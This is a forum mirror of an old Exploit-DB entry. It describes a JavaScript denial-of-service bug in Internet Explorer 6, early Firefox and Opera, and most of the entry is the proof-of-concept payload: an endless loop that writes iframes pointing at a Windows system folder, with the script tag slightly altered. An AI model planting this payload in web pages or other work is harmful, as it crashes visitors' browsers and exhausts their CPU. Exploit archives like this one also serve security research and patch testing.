- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24395
- Проверка EDB
-
- Пройдено
- Автор
- MEFAKON
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2004-08-23
Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service
Код:
source: https://www.securityfocus.com/bid/10998/info
Web browsers from various vendors are reported prone to a JavaScript denial-of-service vulnerability.
The specified JavaScript code will consume 100% of the CPU resources of the affected computer, crashing the browser.
Mozilla Firefox, Microsoft Internet Explorer, and Opera are all reportedly affected by this vulnerability.
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
- Источник
- www.exploit-db.com